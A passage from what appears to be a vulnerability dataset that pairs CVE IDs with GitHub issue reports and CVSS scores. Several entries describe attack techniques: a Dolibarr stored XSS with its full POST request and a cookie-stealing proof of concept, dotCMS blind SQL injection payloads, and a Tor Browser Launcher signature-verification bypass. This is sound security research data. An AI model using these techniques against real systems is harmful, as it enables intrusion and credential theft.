NUMBERTAG APITAG XSS Payload injected to APITAG getpage APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG FILETAG APITAG NUMBERTAG APITAG XSS Payload gets reflected in the browser APITAG NUMBERTAG APITAG The GET request parameter APITAG var:page APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG var:page APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG APITAG NUMBERTAG APITAG The GET request parameter APITAG var:menu APITAG variable in the following URL APITAG URLTAG APITAG is vulnerable to Cross Site Scripting (XSS). FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to APITAG var:menu APITAG variable and its echoed back in the given response URL APITAG URLTAG APITAG APITAG APITAG PATHTAG \u2013 Discovered in Netgear Router Firmware Version NUMBERTAG PATHTAG Reported to vendor through support option but, no response PATHTAG Reported to vendor through another support option available APITAG here APITAG . But, again no response. PATHTAG Finally, Technical Team started addressing about the issue after so many followups through phone/mail. PATHTAG Vulnerability got fixed & case was closed. PATHTAG Netgear Released updated version NUMBERTAG APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-11086",
        "Issue_Url_old": "https://github.com/oauth-xx/oauth-ruby/issues/137",
        "Issue_Url_new": "https://github.com/oauth-xx/oauth-ruby/issues/137",
        "Repo_new": "oauth-xx/oauth-ruby",
        "Issue_Created_At": "2016-12-01T21:59:31Z",
        "description": "Certificate and chain not validated if certificate bundle cannot be found. While analysing the source code of some third party libraries we use in our projects, I found an issue with the way certificate validation is handled in this library. If the certificate bundle cannot be found on the file system at three known/specified locations, then it silently falls back to a mode (i.e. APITAG ) in which the certificate and the certificate chain aren't validated at all. See the following code fragments copied from APITAG . If the environment variable APITAG is not set, and no file can be found in the three specified locations, then APITAG is assigned nil . If you then look at the second code fragment, you can see that APITAG will be set to APITAG if APITAG equals nil and if the user hasn't explicitly set APITAG in the options object. Lines NUMBERTAG URLTAG : ERRORTAG Lines NUMBERTAG URLTAG : CODETAG I would expect a library to fail hard (i.e. throw an exception) in this case, and not silently fall back to an insecure mode. Also, it might be a good idea to embed a certificate bundle (e.g. FILETAG in the library itself. If no system certificate bundle can be found, then you could always fall back to the embedded certificate bundle. Let me know if you do have questions.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-1133",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/682",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/682",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2016-01-07T09:22:38Z",
        "description": "HTTP response splitting. Hi, I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return and new line (CRLF). Example: APITAG CODETAG the h2o config: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-1541",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/656",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/656",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-02-08T18:18:05Z",
        "description": "Vulnerable code, CVETAG . Looking to responsibly disclose a vulnerability in libarchive that could permit arbitrary code execution. We have samples to support our discovery.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-1905",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/19479",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/19479",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2016-01-11T15:29:14Z",
        "description": "api server: patch operation should use patched object to check admission control. Currently, patch will check admission control with an empty object and if it passes, then will proceed to update the object with the patch. Admission control plugins don't get a chance to see/validate what is actually going to be updated.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.7,
        "impactScore": 4.0,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2016-1906",
        "Issue_Url_old": "https://github.com/openshift/origin/issues/6556",
        "Issue_Url_new": "https://github.com/openshift/origin/issues/6556",
        "Repo_new": "openshift/origin",
        "Issue_Created_At": "2016-01-06T19:23:45Z",
        "description": "Can edit a build config to a strategy that isn't allowed by policy builds still fail correctly. If I apply the policy changes to restrict certain build strategies, I can create a BC with an allowed strategy and then edit the BC to use a restricted strategy, that edit should fail. Instead it allows the modification. It does still correctly prevent the builds from being launched.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-1912",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/4341",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/4341",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2016-01-06T18:37:07Z",
        "description": "XSS vulnerability on latest version. Hi all, I don't think it's a good idea to post this here. But nobody respond to my mail and Dolibarr Official twitter account advise me to post this here ( URLTAG so ... Here is an advisory about XSS Vulnerability on Dolibarr latest version APITAG Exploit Title: XSS on dolibarr NUMBERTAG Date: PATHTAG Author: Mickael Dorigny @ Synetis Vendor or Software Link: FILETAG Category: XSS Vulnerability description : APITAG A Stored XSS is available in the Dolibarr NUMBERTAG core code. No module needs to be activated to exploit this XSS vulnerability because an attacker can use the user attributes management to do it. This XSS can be exploited through a basic user account on the dolibarr installation. Impacted users are administrators and users that have right to check other user's attributes. APITAG n NUMBERTAG Stored XSS in user attributes: APITAG Once a simple user is connected with his account, he can modifiy his attributes like Last name, First name, Mobile number, etc.. These informations can be reviewed by other users who have administration privileges. Note that some basic protection are present just after form submitting. These protection doesn't allow attacker to use basic APITAG tips like \" APITAG \" tags or \"onerror\" APITAG But some other events or still allowed. Using the APITAG HTML tag and the \"onmouseover\" APITAG event, we can force an admin to pass his mouse over the injected image. This event can be used to execute valid APITAG instructions in the administrator browser or in browser of other users allowed to check user's attributes. APITAG : As an authenticated user, fullfill APITAG name\", APITAG name\", \"email\", \"job\" or \"signature\" input with this : user1 APITAG [REQUEST] URLTAG [POSTDATA NUMBERTAG Content Disposition: form data; name=\"token\" APITAG NUMBERTAG Content Disposition: form data; name=\"action\" update NUMBERTAG Content Disposition: form data; name=\"entity NUMBERTAG Content Disposition: form data; name=\"lastname\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"firstname\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"job\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"gender\" man NUMBERTAG Content Disposition: form data; name=\"login\" user NUMBERTAG Content Disposition: form data; name=\"password\" user NUMBERTAG Content Disposition: form data; name=\"admin NUMBERTAG Content Disposition: form data; name=\"superadmin NUMBERTAG Content Disposition: form data; name=\"office_phone NUMBERTAG Content Disposition: form data; name=\"user_mobile NUMBERTAG Content Disposition: form data; name=\"office_fa NUMBERTAG Content Disposition: form data; name=\"email\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"signature\" user1 APITAG NUMBERTAG Content Disposition: form data; name=\"fk_user NUMBERTAG Content Disposition: form data; name=\"weeklyhours NUMBERTAG Content Disposition: form data; name=\"save\" Save NUMBERTAG Note that APITAG name\" and APITAG name\" input are displayed in the APITAG of users\" page, but they are truncated after NUMBERTAG characters. This trunctation limits available XSS payloads. We can use the \"signature\" input to insert more APITAG instructions in the same HTML form. Admin will then see this signature when they will click on a user in the APITAG of users\" to see all his attributes. Image insertion can target an existent or a non existent image. A little tips to have more chance to trap an admin is to upload a very big image (like NUMBERTAG that will cover all the website page. Once attributes are modified. Another user like an admin can check your attributes and then execute APITAG instruction by passing his mouse over the injected image. Here is another Poc that will send the admin's cookie on a website controled by an attacker using a GET HTTP request. Inject this payload in the \"signature\" input : APITAG Using this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such as cookies. This is a APITAG Video made by myself to expose the most dangerous usage of this vulnerability : URLTAG Feel free to ask more details if needed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2016-2169",
        "Issue_Url_old": "https://github.com/cloudfoundry/cloud_controller_ng/issues/568",
        "Issue_Url_new": "https://github.com/cloudfoundry/cloud_controller_ng/issues/568",
        "Repo_new": "cloudfoundry/cloud_controller_ng",
        "Issue_Created_At": "2016-03-23T13:54:24Z",
        "description": "CAPI shouldn't allow users to create apps with routes matching CF service subdomains. Today we stumbled upon a very interesting bug within CAPI, which I spoke about with MENTIONTAG on the APITAG APITAG Source) Slack. We were experiencing HTTP ERRORTAG errors approximately NUMBERTAG of the time when connecting to the UAA via the CF CLI. We also had similar errors with one of our internal services using the cf java client URLTAG , which gave us errors such as ERRORTAG Turns out that one of our users has created an app with route APITAG , and that caused this behaviour. Since you can have multiple apps with the same domain bound on it, CF is nicely load balancing traffic to the 'real' APITAG (the UAA) and the user's app, which makes this fail the NUMBERTAG of the time my CF CLI or APITAG hits the user's app instead of the actual UAA. In our case, the user was not a malicious user, but it would be pretty straight forward to inject a APITAG Always\u201d application that listens on the same route as the UAA, which would then catch/receive UAA APITAG tokens. In the case of the APITAG (and also the CF CLI) I think it makes sense they don't block this kind of behaviour, as they will just act as a pure passthrough for anything you request. However, I believe that CF should block the ability to use the same route as the UAA though for security reasons. In a default (stock) CF release installation, we believe this should (probably) at least be blocked for these CF service subdomains, if this has not already been done: APITAG APITAG / APITAG APITAG APITAG APITAG We think that this might be a CAPI (security) issue. MENTIONTAG will also ask MENTIONTAG about this in person.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-2183",
        "Issue_Url_old": "https://github.com/ssllabs/ssllabs-scan/issues/387",
        "Issue_Url_new": "https://github.com/ssllabs/ssllabs-scan/issues/387",
        "Repo_new": "ssllabs/ssllabs-scan",
        "Issue_Created_At": "2016-08-24T16:38:48Z",
        "description": "SWEET NUMBERTAG triple DES should now be considered as \u201cbad\u201d as RC4.. URLTAG I think NUMBERTAG DES should be flagged INSECURE, as RC4 are.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-2230",
        "Issue_Url_old": "https://github.com/RasPlex/RasPlex/issues/453",
        "Issue_Url_new": "https://github.com/rasplex/rasplex/issues/453",
        "Repo_new": "rasplex/rasplex",
        "Issue_Created_At": "2015-12-27T13:27:27Z",
        "description": "SSH insecure by default. SSH is enabled by default, the default login details are widely published. People are exposing their APITAG installs to the web. Even if they aren't putting them in a DMZ, or otherwise exposing them to the web, it's still horribly insecure by default. Bizarrely, you're prevented from changing the default password because passwd is missing. Possible solutions: a) Make SSH off by default, force a password to be set the first time SSH is enabled b) Generate a random password and show it in settings.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-2355",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/8848",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/8848",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2016-04-08T02:58:46Z",
        "description": "SQL Injection Vulnerability. Attack details url: URLTAG APITAG URL encoded POST input APITAG was set to NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG Tests performed NUMBERTAG OR NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG APITAG FALSE NUMBERTAG OR NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => FALSE NUMBERTAG OR NUMBERTAG AND NUMBERTAG or APITAG => TRUE Original value: APITAG Parameter: APITAG (POST) Type: boolean based blind Title: AND boolean based blind WHERE or HAVING clause Payload: APITAG EMAILTAG APITAG AND NUMBERTAG AND APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-2515",
        "Issue_Url_old": "https://github.com/hueniverse/hawk/issues/168",
        "Issue_Url_new": "https://github.com/mozilla/hawk/issues/168",
        "Repo_new": "mozilla/hawk",
        "Issue_Created_At": "2016-01-19T19:53:51Z",
        "description": "Long headers or uris can cause minor APITAG Reported by MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-3180",
        "Issue_Url_old": "https://github.com/micahflee/torbrowser-launcher/issues/229",
        "Issue_Url_new": "https://github.com/micahflee/torbrowser-launcher/issues/229",
        "Repo_new": "micahflee/torbrowser-launcher",
        "Issue_Created_At": "2016-03-13T21:49:44Z",
        "description": "Signature verification bypass attack. Jann Horn reported a clever security issue that lets an attacker bypass PGP signature verification. Because Tor Browser Launcher uses defense in depth, an attacker would need to combine this attack with other attacks before they could succeed in an exploit. Specifically, they would need to be in a position to man in the middle the download and also defeat the HTTPS connection to FILETAG or one of the mirrors. The first time you run Tor Browser Launcher, it works like this: Downloads URLTAG to learn the current stable version of Tor Browser Uses the version, as well as the mirror URL (defaults to URLTAG to build URLs to download the APITAG file (I'll call it $tarball) and APITAG ($sigfile), and downloads them both Verifies the signature by running: APITAG The problem is that APITAG can be ambiguous. If $sigfile is APITAG , it can either mean that that's a detached signature and the content is in APITAG , or it can mean that it's the content is included in the same file. If an attacker can MITM connections to FILETAG or whatever mirror is set, and their MITM server uses a trusted certificate, then they can replace $sigfile with a single file that contains the valid Tor Browser tarball and signature, and replace $tarball with something malicious but completely unsigned. When Tor Browser Launcher downloads $sigfile and verifies it, the verification will succeed and it will extract $tarball and execute APITAG , which will let the attack run their arbitrary code as the current user (they could even launch a legit Tor Browser if they want to be stealthy). The solution is to specify the content as well as the signature file when verifying the signature, e.g.: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-3182",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/725",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/725",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-03-16T10:05:18Z",
        "description": "Heap Corruption in opj_free function. URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-3183",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/726",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/726",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-03-16T10:05:56Z",
        "description": "Out Of Bounds Read in sycc NUMBERTAG to_rgb function. URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-3674",
        "Issue_Url_old": "https://github.com/x-stream/xstream/issues/25",
        "Issue_Url_new": "https://github.com/x-stream/xstream/issues/25",
        "Repo_new": "x-stream/xstream",
        "Issue_Created_At": "2015-09-07T08:53:09Z",
        "description": "XXE vulnerability . DTD processing was enabled and therefore, XML deserialization process was vulnerable to XML External Entity Injection (I was able to expose local files). URLTAG Suggestion is to ignore client side DOCTYPE declarations.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-3697",
        "Issue_Url_old": "https://github.com/docker/docker/issues/21436",
        "Issue_Url_new": "https://github.com/moby/moby/issues/21436",
        "Repo_new": "moby/moby",
        "Issue_Created_At": "2016-03-23T18:08:09Z",
        "description": "Numeric user id passed to user interpreted as user name if user name is numeric in container /etc/passwd. Output of docker version : CODETAG Output of docker info : ERRORTAG Additional environment details (AWS, APITAG physical, etc.): Running under APITAG through Vagrant. Steps to reproduce the issue NUMBERTAG On docker host: APITAG NUMBERTAG In the just started container: APITAG NUMBERTAG In another terminal on the same docker host: APITAG Describe the results you received: APITAG Describe the results you expected: It should show my user id as NUMBERTAG not NUMBERTAG Additional information you deem important (e.g. issue happens only occasionally): This could let image creators create malicious images which when run with a specific user id grant root in the container, and thus root to any mounted volumes.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-3735",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/470",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/470",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-04-26T09:03:40Z",
        "description": "increase randomness on generate_key. Current functions used to generate random strings are not \"that much random\" (depending on the PHP version and operating system).",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-3956",
        "Issue_Url_old": "https://github.com/npm/npm/issues/8380",
        "Issue_Url_new": "https://github.com/npm/npm/issues/8380",
        "Repo_new": "npm/npm",
        "Issue_Created_At": "2015-05-27T22:30:34Z",
        "description": "npm uses auth token from registry on http[s]:// dependencies, breaking APITAG URLs. APITAG Excerpt from the log: APITAG further: ERRORTAG Removing auth token with npm logout helps. Apparently APITAG server reacts badly to foreign auth tokens. This issue has not been observed with npm NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-3958",
        "Issue_Url_old": "https://github.com/golang/go/issues/14959",
        "Issue_Url_new": "https://github.com/golang/go/issues/14959",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2016-03-25T06:40:00Z",
        "description": "syscall: guard against Windows DLL preloading attacks . Taru Karttunen noted that Go should be more paranoid by default when loading DLLs. Background: URLTAG Microsoft's guidelines: FILETAG APITAG docs: FILETAG MENTIONTAG proposed NUMBERTAG Change APITAG to call APITAG with APITAG instead of calling APITAG That is, APITAG is now secure by default and cannot load DLLs from the directory containing the executable NUMBERTAG Add a APITAG to PATHTAG so that users can still get at the old behavior if they want it (by appropriate passing of flags). CL forthcoming. /cc MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-3995",
        "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/146",
        "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/146",
        "Repo_new": "weidai11/cryptopp",
        "Issue_Created_At": "2016-03-11T11:00:05Z",
        "description": "Timing Attack Counter Measure AES. For both APITAG and APITAG there is some code to avoid timing attacks: ERRORTAG As far as I understand it, the goal is to do at least one read per cache line in order to preload Te into the cache. However when looking at the NUMBERTAG binary (obtained in the Debian package URLTAG , I noticed that if the loop structure remains, the memory reads have been optimized away: CODETAG This counter measure seems to be removed by the compiler. Hence, the binary may be vulnerable to timing attacks.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-4040",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/8840",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/8840",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2016-04-07T12:12:18Z",
        "description": "Further sortby sanitizing. We missed a single case when sanitizing the accepted sort by values in the workflow portlet.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2016-4074",
        "Issue_Url_old": "https://github.com/stedolan/jq/issues/1136",
        "Issue_Url_new": "https://github.com/stedolan/jq/issues/1136",
        "Repo_new": "stedolan/jq",
        "Issue_Created_At": "2016-04-24T08:31:16Z",
        "description": "Stack exhaustion parsing a JSON file. Hi, A crash caused by stack exhaustion parsing a JSON was found. It affects, at least version NUMBERTAG as well as the last git revision. To reproduce: $ gdb PATHTAG args jq . APITAG ... Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff NUMBERTAG fa7c2 in _IO_new_file_overflow (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , ch NUMBERTAG at APITAG NUMBERTAG fileops.c: No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG fa7c2 in _IO_new_file_overflow (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , ch NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG a1 in _IO_new_file_xsputn (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , data=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG eee6d in __GI__IO_fwrite (buf=<optimized out>, size NUMBERTAG count NUMBERTAG fp NUMBERTAG ffff4b3f NUMBERTAG APITAG ) at APITAG NUMBERTAG in put_buf (s NUMBERTAG fffff7ff0cc NUMBERTAG len NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG is_tty NUMBERTAG at APITAG NUMBERTAG c in put_char (c NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG T NUMBERTAG at APITAG NUMBERTAG ab1 in put_indent (n NUMBERTAG flags NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG T NUMBERTAG at APITAG NUMBERTAG e in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG APITAG stack frames follow...) Find attached a compressed JSON file to reproduce it (the total size of this file is NUMBERTAG kb, but it should be compressed in order to upload it here) Regards, Gustavo.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-4074",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/10263",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/10263",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2021-05-20T06:33:50Z",
        "description": "Vunerability CVETAG on jq. Overview of the Issue Security tool scanned the APITAG NUMBERTAG docker image and found the following CVE: CVETAG Reproduction Steps Steps to reproduce this issue NUMBERTAG Get lastest APITAG NUMBERTAG docker image (we testes both latest and NUMBERTAG Use a security tool to scan for CVEs Environment Kubernetes version: AKS NUMBERTAG consul version NUMBERTAG and NUMBERTAG Security scan result Fixable CVETAG (CVSS NUMBERTAG found in component 'jq' (version NUMBERTAG r0) in container 'consul', resolved by version NUMBERTAG rc1 r0",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-4300",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/718",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/718",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-06-19T21:19:37Z",
        "description": "Security Issue NUMBERTAG Placeholder for a security issue that is being investigated. A fix will be committed shortly.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-4302",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/719",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/719",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-06-19T21:21:21Z",
        "description": "Security issue NUMBERTAG Placeholder for a security issue that is being investigated. A fix will be committed soon.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-4425",
        "Issue_Url_old": "https://github.com/akheron/jansson/issues/282",
        "Issue_Url_new": "https://github.com/akheron/jansson/issues/282",
        "Repo_new": "akheron/jansson",
        "Issue_Created_At": "2016-05-01T19:56:44Z",
        "description": "Stack exhaustion parsing a JSON file. Hi, A crash caused by stack exhaustion parsing a JSON was found. It affects, at least version NUMBERTAG as well as the last git revision (and maybe others). To reproduce using jshon: $ python c 'print NUMBERTAG FILETAG $ gdb args ./jshon F FILETAG ... Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff4e NUMBERTAG in ?? () from PATHTAG (gdb) bt NUMBERTAG ffff4e NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff4e NUMBERTAG b7d in ?? () from PATHTAG NUMBERTAG ffff4e NUMBERTAG in malloc () from PATHTAG NUMBERTAG c NUMBERTAG in jsonp_malloc (size NUMBERTAG at APITAG NUMBERTAG f NUMBERTAG in json_array () at APITAG NUMBERTAG afd0 in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG 